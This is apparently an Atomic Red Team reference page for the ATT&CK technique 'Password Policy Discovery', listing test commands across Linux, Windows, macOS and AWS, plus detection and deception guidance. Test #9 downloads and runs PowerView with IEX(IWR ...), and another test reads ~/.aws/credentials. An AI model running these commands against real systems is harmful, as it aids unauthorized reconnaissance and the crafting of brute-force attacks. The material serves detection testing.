T1201 - Password Policy Discovery#
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as ‘pass123’; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a Network Device CLI on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).
Atomic Tests#
Atomic Test #1 - Examine password complexity policy - UbuntuLists the password complexity policy to console on Ubuntu Linux.#
Supported Platforms: linux#### Attack Commands: Run with bash
cat /etc/pam.d/common-password
Invoke-AtomicTest T1201 -TestNumbers 1
Atomic Test #2 - Examine password complexity policy - FreeBSDLists the password complexity policy to console on FreeBSD.#
Supported Platforms: linux#### Attack Commands: Run with sh
cat /etc/pam.d/passwd
Invoke-AtomicTest T1201 -TestNumbers 2
Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 7.x#
Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
Supported Platforms: linux
Dependencies: Run with bash!#
Description: System must be CentOS or RHEL v7#
Check Prereq Commands:#
if [ $(uname -a | grep -ioP 'el[0-9]' | grep -oP '[0-9]') -eq "7" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
echo Please run from CentOS or RHEL v7
Invoke-AtomicTest T1201 -TestNumbers 3 -GetPreReqs
Attack Commands: Run with bash#
cat /etc/security/pwquality.conf
Invoke-AtomicTest T1201 -TestNumbers 3
Atomic Test #4 - Examine password complexity policy - CentOS/RHEL 6.x#
Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
Supported Platforms: linux
Dependencies: Run with bash!#
Description: System must be CentOS or RHEL v6#
Check Prereq Commands:#
if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi;
Get Prereq Commands:#
echo Please run from CentOS or RHEL v6
Invoke-AtomicTest T1201 -TestNumbers 4 -GetPreReqs
Attack Commands: Run with bash#
cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf
Invoke-AtomicTest T1201 -TestNumbers 4
Atomic Test #5 - Examine password expiration policy - All LinuxLists the password expiration policy to console on CentOS/RHEL/Ubuntu.#
Supported Platforms: linux#### Attack Commands: Run with bash
cat /etc/login.defs
Invoke-AtomicTest T1201 -TestNumbers 5
Atomic Test #6 - Examine local password policy - WindowsLists the local password policy to console on Windows.#
Supported Platforms: windows#### Attack Commands: Run with command_prompt
net accounts
Invoke-AtomicTest T1201 -TestNumbers 6
Atomic Test #7 - Examine domain password policy - WindowsLists the domain password policy to console on Windows.#
Supported Platforms: windows#### Attack Commands: Run with command_prompt
net accounts /domain
Invoke-AtomicTest T1201 -TestNumbers 7
Atomic Test #8 - Examine password policy - macOSLists the password policy to console on macOS.#
Supported Platforms: macos#### Attack Commands: Run with bash
pwpolicy getaccountpolicies```
Invoke-AtomicTest T1201 -TestNumbers 8
Atomic Test #9 - Get-DomainPolicy with PowerViewUtilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.#
Supported Platforms: windows#### Attack Commands: Run with powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
Invoke-AtomicTest T1201 -TestNumbers 9
Atomic Test #10 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicyThe following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.#
Upon successful execution a listing of the policy implemented will display.
Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
get-addefaultdomainpasswordpolicy
Invoke-AtomicTest T1201 -TestNumbers 10
Atomic Test #11 - Use of SecEdit.exe to export the local security policy (including the password policy)SecEdit.exe can be used to export the current local security policy applied to a host.#
Reference
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with command_prompt
secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt
Invoke-AtomicTest T1201 -TestNumbers 11
Atomic Test #12 - Examine AWS Password Policy#
This atomic test will display details about the password policy for the current AWS account.
Supported Platforms: iaas:aws
Elevation Required (e.g. root or admin)
Dependencies: Run with sh!#
Description: Check if ~/.aws/credentials file has a default stanza is configured#
Check Prereq Commands:#
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:#
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Invoke-AtomicTest T1201 -TestNumbers 12 -GetPreReqs
Attack Commands: Run with sh#
aws iam get-account-password-policy
Invoke-AtomicTest T1201 -TestNumbers 12
Detection#
Monitor logs and processes for tools and command line arguments that may indicate they’re being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.
Shield Active Defense#
Software Manipulation#
Make changes to a system’s software properties and functions to achieve a desired effect.
Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.
Opportunity#
In an adversary engagement operation, there is an opportunity to impact what an adversary sees when they execute commands on a system.
Use Case#
A defender can alter the output of the password policy description so the adversary is unsure of exactly what the requirements are.
Procedures#
Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities. Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use. Alter the output of an adversary’s profiling commands to make newly-built systems look like the operating system was installed months earlier. Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.